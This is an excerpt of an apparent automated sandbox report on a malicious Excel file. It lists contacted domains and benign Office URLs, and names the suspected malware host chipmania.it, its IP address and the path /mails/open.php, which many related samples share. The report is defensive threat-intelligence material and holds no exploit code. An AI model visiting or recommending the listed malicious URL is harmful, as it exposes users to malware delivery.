                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
                https://ncus-000.contentsync.0%URL Reputationsafe
                https://ncus-000.contentsync.0%URL Reputationsafe
                https://ncus-000.contentsync.0%URL Reputationsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://dataservice.o365filtering.com0%URL Reputationsafe
                https://dataservice.o365filtering.com0%URL Reputationsafe
                https://dataservice.o365filtering.com0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
                https://directory.services.0%URL Reputationsafe
                https://directory.services.0%URL Reputationsafe
                https://directory.services.0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chipmania.it
                185.81.0.78
                truefalseunknown
                www.chipmania.it
                unknown
                unknowntrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.diagnosticssdf.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                  high
                  https://login.microsoftonline.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                    high
                    https://shell.suite.office.com:14430A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                      high
                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                        high
                        https://autodiscover-s.outlook.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                          high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                            high
                            https://cdn.entity.0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://api.addins.omex.office.net/appinfo/query0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                              high
                              https://wus2-000.contentsync.0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://clients.config.office.net/user/v1.0/tenantassociationkey0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                high
                                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                  high
                                  https://powerlift.acompli.net0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://rpsticket.partnerservices.getmicrosoftkey.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://lookup.onenote.com/lookup/geolocation/v10A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                    high
                                    https://cortana.ai0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                      high
                                      https://cloudfiles.onenote.com/upload.aspx0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                        high
                                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                          high
                                          https://entitlement.diagnosticssdf.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                            high
                                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                              high
                                              https://api.aadrm.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://ofcrecsvcapi-int.azurewebsites.net/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                high
                                                https://api.microsoftstream.com/api/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                  high
                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                    high
                                                    https://cr.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                      high
                                                      https://portal.office.com/account/?ref=ClientMeControl0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                        high
                                                        https://ecs.office.com/config/v2/Office0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                          high
                                                          https://graph.ppe.windows.net0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                            high
                                                            https://res.getmicrosoftkey.com/api/redemptionevents0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://powerlift-frontdesk.acompli.net0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://tasks.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                              high
                                                              https://officeci.azurewebsites.net/api/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                high
                                                                https://store.office.cn/addinstemplate0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://wus2-000.pagecontentsync.0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                  high
                                                                  https://globaldisco.crm.dynamics.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                    high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                      high
                                                                      https://store.officeppe.com/addinstemplate0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://dev0-api.acompli.net/autodetect0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.odwebp.svc.ms0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groups0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                        high
                                                                        https://web.microsoftstream.com/video/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                          high
                                                                          https://graph.windows.net0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                            high
                                                                            https://dataservice.o365filtering.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officesetup.getmicrosoftkey.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://analysis.windows.net/powerbi/api0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                              high
                                                                              https://prod-global-autodetect.acompli.net/autodetect0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://outlook.office365.com/autodiscover/autodiscover.json0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                high
                                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                  high
                                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                    high
                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                      high
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                        high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                          high
                                                                                          http://weather.service.msn.com/data.aspx0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                            high
                                                                                            https://apis.live.net/v5.0/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                              high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                  high
                                                                                                  https://management.azure.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnostics.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/ios0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmedia0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/Activities0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.net0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                    high
                                                                                                                    https://entitlement.diagnostics.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                      high
                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                          high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                            high
                                                                                                                            https://templatelogging.office.com/client/log0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.office365.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                high
                                                                                                                                https://webshell.suite.office.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus-000.contentsync.0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://login.windows.net/common/oauth2/authorize0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://graph.windows.net/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://devnull.onenote.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://messaging.office.com/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com/v20A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://skyapi.live.net/Activity/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://clients.config.office.net/user/v1.0/mac0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://dataservice.o365filtering.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://api.cortana.ai0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://onedrive.live.com0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://directory.services.0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://staging.cortana.ai0A9D11FF-4298-45F3-AA1F-C11C872960F8.0.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                185.81.0.78
                                                                                                                                                                unknownItaly
                                                                                                                                                                52030SERVERPLAN-ASITfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                Analysis ID:355599
                                                                                                                                                                Start date:20.02.2021
                                                                                                                                                                Start time:02:11:42
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 6m 55s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:light
                                                                                                                                                                Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                                Number of analysed new started processes analysed:32
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLS@7/8@1/1
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 37.5% (good quality ratio 25%)
                                                                                                                                                                • Quality average: 66.7%
                                                                                                                                                                • Quality standard deviation: 47.1%
                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 204.79.197.200, 13.107.21.200, 13.64.90.137, 52.109.32.63, 52.109.8.23, 52.109.12.24, 168.61.161.212, 104.42.151.234, 51.104.139.180, 40.88.32.150, 23.218.208.56, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 51.11.168.160, 52.155.217.156
                                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                02:13:18API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                                                                                                02:13:18API Interceptor1x Sleep call for process: wermgr.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php
                                                                                                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                • www.chipmania.it/mails/open.php

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78
                                                                                                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 185.81.0.78

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

